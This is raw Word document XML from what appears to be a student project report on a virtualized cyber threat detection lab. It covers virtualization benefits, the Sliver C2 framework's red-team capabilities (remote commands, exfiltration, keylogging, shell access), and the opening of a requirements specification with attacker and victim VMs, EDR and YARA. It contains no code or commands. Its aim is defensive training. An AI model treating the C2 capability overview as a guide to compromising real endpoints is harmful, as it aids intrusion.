      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Virtualization allows organizations to deploy security appliances, such as firewalls, intrusion detection/prevention systems (IDS/IPS), and security information and event management (SIEM) solutions, as virtual instances within their network infrastructure. By virtualizing security appliances, organizations can optimize resource utilization, scale deployments dynamically, and improve flexibility and agility in responding to evolving security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2.4.2 Benefits of Virtualization in Cybersecurity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a) Cost Efficiency:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Virtualization reduces hardware costs, energy consumption, and maintenance overhead associated with physical infrastructure, enabling organizations to achieve cost savings while maximizing resource utilization.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b) Flexibility and Scalability: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Virtualization provides flexibility and scalability, allowing organizations to create, modify, and scale virtualized environments on-demand to meet evolving security requirements and business needs.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c) Isolation and Security: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Virtualization enhances security by providing isolated environments for testing, analysis, and experimentation, minimizing the risk of cross-contamination and compromise of production systems.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d) Agility and Innovation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Virtualization fosters agility and innovation by enabling rapid experimentation, prototyping, and deployment of security solutions and technologies, accelerating time-to-market and driving continuous improvement in cybersecurity practices.</w:t>
      </w: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2.5 Sliver C2 Framework and its Role in Adversarial Simulation</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Sliver Command and Control (C2) framework stands as a powerful and adaptable tool in the arsenal of cybersecurity professionals, particularly those engaged in adversarial simulation, red teaming, and penetration testing endeavors. Sliver empowers security practitioners to replicate real-world cyber attacks by establishing covert channels of communication between attacker-controlled servers and compromised endpoints within a simulated environment. By leveraging Sliver's versatile capabilities, red teams can orchestrate a wide array of attack scenarios, ranging from initial access and reconnaissance to lateral movement, privilege escalation, and data exfiltration, thus providing organizations with invaluable insights into their cybersecurity defenses and incident response capabilities.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2.5.1 Key Features of Sliver C2 Framework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1) Command Execution:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sliver facilitates remote command execution on compromised endpoints, enabling red teams to execute arbitrary commands and scripts to gather information, manipulate system configurations, and execute post-exploitation activities.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2) File Transfer:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sliver allows for seamless file transfer between attacker-controlled servers and compromised endpoints, facilitating the exfiltration of sensitive data, the deployment of malicious payloads, and the manipulation of files and directories within the target environment.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3) Keylogging:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sliver provides keylogging capabilities, enabling red teams to capture keystrokes and monitor user interactions on compromised endpoints, thereby gaining insight into user behavior, credentials, and sensitive information accessed during the course of an attack.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4) Shell Access:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sliver offers shell access to compromised endpoints, providing red teams with interactive command-line interfaces for performing reconnaissance, privilege escalation, and lateral movement activities within the target environment.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2.5.2 Role of Sliver in Adversarial Simulation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a) Realistic Attack Simulation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Sliver enables red teams to emulate realistic cyber attacks by replicating the tactics, techniques, and procedures (TTPs) employed by real-world adversaries. By simulating diverse attack scenarios, red teams can assess an organization's security defenses, identify potential vulnerabilities, and evaluate the effectiveness of incident response procedures in mitigating cyber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b) Comprehensive Security Assessments:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sliver facilitates comprehensive security assessments by providing red teams with a wide range of features and functionalities for conducting penetration tests, red team engagements, and security evaluations. By leveraging Sliver's capabilities, red teams can uncover hidden vulnerabilities, exploit misconfigurations, and demonstrate the impact of potential security breaches on an organization's digital assets and operations.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c) Strategic Threat Modeling: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Sliver empowers red teams to develop strategic threat models tailored to the specific objectives and risk profiles of target organizations. By mapping out potential attack paths, identifying critical assets, and prioritizing attack vectors, red teams can guide their simulation efforts to maximize the efficacy of their security assessments and deliver actionable insights to stakeholders.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cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="365F91"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="365F91"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Chapter 3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="365F91"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="365F91"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>3.1 Software Requirement Specifications</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="365F91"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-IN"/>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3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Introduction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Purpose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document outlines the functional and non-functional requirements for a software project titled </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"Cyber Threat Detection and Response</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>" It details the functionalities, performance considerations, security measures, and other aspects necessary to create a realistic and educational environment for cybersecurity analysts to practice detecting, analyzing, and responding to simulated cyber threats.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="420" w:leftChars="0" w:hanging="4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Document Conventions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This Software Requirements Specification (SRS) for the Cyber Threat Detection and Response project adheres to specific conventions to enhance clarity and coherence:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="397" w:leftChars="0" w:hanging="397" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>Structured Navigation:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The document employs a hierarchical system with numbered sections and sub-sections for easy organization and understanding.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="397" w:leftChars="0" w:hanging="397" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>Visual Emphasis:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Key points are highlighted using formatting techniques such as bolding, bulleting, and italicizing to improve readability and draw attention.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="397" w:leftChars="0" w:hanging="397" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Clarity in Expression: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>La</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nguage used is both articulate and succinct, maintaining a professional tone accessible to diverse audiences.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Intended Audience and Reading Suggestions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This document is intended for various stakeholders involved in the development, implementation, and evaluation of the Cyber Threat Detection and Response system. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Familiarity with basic cybersecurity concepts is recommended for a complete understanding.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The primary audience includes:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Cybersecurity professionals</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>responsible for understanding the technical requirements and capabilities of the Cyber Threat Detection and Response system.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Analysts and researchers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>involved in evaluating and testing cyber threat detection and response solutions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:bidi w:val="0"/>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b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Project stakeholders</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> including managers and decision-makers, seeking insight into the objectives and functionalities of the proposed system.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Product Scope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focuses on simulating a controlled environment for educational purposes and demonstration. It encompasses the following functionalities:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>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Setting up virtual machines for attacker and victim simulations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>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Utilizing Sliver C2 framework for establishing command and control communication</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> between the attacker and victim machine</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>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Employing LimaCharlie EDR for threat detection and response</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the victim machine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> with D&amp;R rule creation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>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Integrating YARA for automated malware scanning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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en-IN"/>
        </w:rPr>
        <w:t>Product Overview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This project simulates and responds to real-time cyber threats, including memory dumps and ransomware attacks, through automated YARA scanning</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> for malware signatures</w:t>
      </w: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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> The environment comprises two virtual machines:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>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6"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Attacker: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Linux (Ubuntu)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>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val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Victim: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Windows (Windows 11)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
